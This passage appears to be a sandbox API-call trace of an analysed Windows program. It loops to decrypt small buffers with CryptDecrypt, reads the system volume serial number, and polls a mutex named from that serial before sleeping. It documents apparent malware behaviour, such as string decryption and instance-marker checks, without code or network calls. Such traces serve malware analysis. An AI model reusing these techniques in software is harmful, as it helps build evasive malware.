phKey=0x221f858*=0xa327e8) returned 1 [0154.504] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0154.504] CryptDecrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0154.504] CryptDestroyKey (hKey=0xa327e8) returned 1 [0154.504] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0154.504] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0154.504] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0154.504] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa327e8) returned 1 [0154.504] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0154.504] CryptDecrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0154.504] CryptDestroyKey (hKey=0xa327e8) returned 1 [0154.504] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0154.504] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0154.504] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0154.504] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0154.504] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0154.504] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0154.504] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0154.504] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa327e8) returned 1 [0154.504] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0154.504] CryptDecrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0154.504] CryptDestroyKey (hKey=0xa327e8) returned 1 [0154.504] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0154.504] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x14c [0154.505] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x0) returned 0x102 [0154.505] CloseHandle (hObject=0x14c) returned 1 [0154.505] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0154.505] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0154.505] Sleep (dwMilliseconds=0x3e8) [0155.509] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0155.509] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32c68) returned 1 [0155.509] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0155.509] CryptDecrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0155.509] CryptDestroyKey (hKey=0xa32c68) returned 1 [0155.509] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0155.509] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0155.509] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0155.509] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32c68) returned 1 [0155.509] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0155.509] CryptDecrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0155.509] CryptDestroyKey (hKey=0xa32c68) returned 1 [0155.509] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0155.509] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0155.509] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0155.509] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0155.509] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0155.509] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0155.509] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0155.509] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32c68) returned 1 [0155.510] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0155.510] CryptDecrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0155.510] CryptDestroyKey (hKey=0xa32c68) returned 1 [0155.510] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0155.510] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x17c [0155.510] WaitForSingleObject (hHandle=0x17c, dwMilliseconds=0x0) returned 0x102 [0155.510] CloseHandle (hObject=0x17c) returned 1 [0155.510] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0155.510] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0155.510] Sleep (dwMilliseconds=0x3e8) [0156.523] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0156.523] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32c68) returned 1 [0156.523] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0156.523] CryptDecrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0156.523] CryptDestroyKey (hKey=0xa32c68) returned 1 [0156.523] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0156.523] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0156.523] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0156.523] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32c68) returned 1 [0156.523] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0156.523] CryptDecrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0156.523] CryptDestroyKey (hKey=0xa32c68) returned 1 [0156.523] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0156.523] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0156.523] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0156.523] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0156.523] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0156.523] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0156.524] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0156.524] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32c68) returned 1 [0156.524] CryptSetKeyParam (hKey=0xa32c68, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0156.524] CryptDecrypt (in: hKey=0xa32c68, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0156.524] CryptDestroyKey (hKey=0xa32c68) returned 1 [0156.524] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0156.524] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x180 [0156.524] WaitForSingleObject (hHandle=0x180, dwMilliseconds=0x0) returned 0x102 [0156.524] CloseHandle (hObject=0x180) returned 1 [0156.524] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0156.524] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0156.524] Sleep (dwMilliseconds=0x3e8) [0157.625] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0157.625] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32968) returned 1 [0157.625] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0157.625] CryptDecrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0157.625] CryptDestroyKey (hKey=0xa32968) returned 1 [0157.625] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0157.625] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0157.626] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0157.626] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32968) returned 1 [0157.626] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0157.626] CryptDecrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0157.626] CryptDestroyKey (hKey=0xa32968) returned 1 [0157.626] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0157.626] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0157.626] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0157.626] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0157.626] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0157.626] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0157.626] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0157.626] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32968) returned 1 [0157.626] CryptSetKeyParam (hKey=0xa32968, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0157.626] CryptDecrypt (in: hKey=0xa32968, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0157.626] CryptDestroyKey (hKey=0xa32968) returned 1 [0157.626] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0157.626] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x14c [0157.626] WaitForSingleObject (hHandle=0x14c, dwMilliseconds=0x0) returned 0x102 [0157.626] CloseHandle (hObject=0x14c) returned 1 [0157.626] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0157.626] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0157.626] Sleep (dwMilliseconds=0x3e8) [0158.703] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0158.703] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32da8) returned 1 [0158.703] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0158.703] CryptDecrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0158.703] CryptDestroyKey (hKey=0xa32da8) returned 1 [0158.703] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0158.703] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0158.703] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0158.703] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32da8) returned 1 [0158.703] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0158.703] CryptDecrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0158.703] CryptDestroyKey (hKey=0xa32da8) returned 1 [0158.703] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0158.703] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0158.704] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0158.704] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0158.704] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0158.704] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0158.704] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0158.704] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32da8) returned 1 [0158.704] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0158.704] CryptDecrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0158.704] CryptDestroyKey (hKey=0xa32da8) returned 1 [0158.704] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0158.704] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x17c [0158.704] WaitForSingleObject (hHandle=0x17c, dwMilliseconds=0x0) returned 0x102 [0158.704] CloseHandle (hObject=0x17c) returned 1 [0158.704] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0158.704] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0158.704] Sleep (dwMilliseconds=0x3e8) [0159.707] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0159.707] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa32da8) returned 1 [0159.707] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0159.707] CryptDecrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0159.707] CryptDestroyKey (hKey=0xa32da8) returned 1 [0159.707] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0159.707] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0159.707] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0159.707] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa32da8) returned 1 [0159.707] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0159.707] CryptDecrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0159.707] CryptDestroyKey (hKey=0xa32da8) returned 1 [0159.708] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0159.708] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0159.708] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0159.708] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0159.708] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0159.708] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0159.708] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0159.708] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa32da8) returned 1 [0159.708] CryptSetKeyParam (hKey=0xa32da8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0159.708] CryptDecrypt (in: hKey=0xa32da8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0159.708] CryptDestroyKey (hKey=0xa32da8) returned 1 [0159.708] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0159.708] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x17c [0159.708] WaitForSingleObject (hHandle=0x17c, dwMilliseconds=0x0) returned 0x102 [0159.708] CloseHandle (hObject=0x17c) returned 1 [0159.708] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0159.708] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0159.708] Sleep (dwMilliseconds=0x3e8) [0160.733] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0160.733] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f858 | out: phKey=0x221f858*=0xa327e8) returned 1 [0160.733] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x221f840, dwFlags=0x0) returned 1 [0160.733] CryptDecrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f80c | out: pbData=0x2227820, pdwDataLen=0x221f80c) returned 1 [0160.733] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.733] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x1e) returned 0x2227848 [0160.733] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x1e) returned 0x2227870 [0160.733] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x90) returned 0x2227898 [0160.733] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7c8, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f830 | out: phKey=0x221f830*=0xa327e8) returned 1 [0160.733] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x221f818, dwFlags=0x0) returned 1 [0160.733] CryptDecrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227898, pdwDataLen=0x221f7e4 | out: pbData=0x2227898, pdwDataLen=0x221f7e4) returned 1 [0160.733] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.733] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227898 | out: hHeap=0x20f0000) returned 1 [0160.733] ExpandEnvironmentStringsW (in: lpSrc="%systemdrive%\\", lpDst=0x2227848, nSize=0xf | out: lpDst="C:\\") returned 0x4 [0160.733] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227870 | out: hHeap=0x20f0000) returned 1 [0160.733] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0160.733] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x3, lpVolumeSerialNumber=0x221f898, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x221f898*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0160.733] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227848 | out: hHeap=0x20f0000) returned 1 [0160.733] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x40) returned 0x2227820 [0160.733] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f824, dwDataLen=0x4c, hPubKey=0x0, dwFlags=0x0, phKey=0x221f88c | out: phKey=0x221f88c*=0xa327e8) returned 1 [0160.733] CryptSetKeyParam (hKey=0xa327e8, dwParam=0x1, pbData=0x221f874, dwFlags=0x0) returned 1 [0160.733] CryptDecrypt (in: hKey=0xa327e8, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2227820, pdwDataLen=0x221f840 | out: pbData=0x2227820, pdwDataLen=0x221f840) returned 1 [0160.733] CryptDestroyKey (hKey=0xa327e8) returned 1 [0160.734] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x8, Size=0x34) returned 0x2227868 [0160.734] OpenMutexW (dwDesiredAccess=0x100000, bInheritHandle=0, lpName="Global\\00019C354B4200") returned 0x194 [0160.734] WaitForSingleObject (hHandle=0x194, dwMilliseconds=0x0) returned 0x102 [0160.734] CloseHandle (hObject=0x194) returned 1 [0160.734] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227820 | out: hHeap=0x20f0000) returned 1 [0160.734] HeapFree (in: hHeap=0x20f0000, dwFlags=0x0, lpMem=0x2227868 | out: hHeap=0x20f0000) returned 1 [0160.734] Sleep (dwMilliseconds=0x3e8) [0162.219] RtlAllocateHeap (HeapHandle=0x20f0000, Flags=0x0, Size=0x20) returned 0x2227820 [0162.219] CryptImportKey (in: hProv=0xa24cf8, pbData=0x221f7f0, 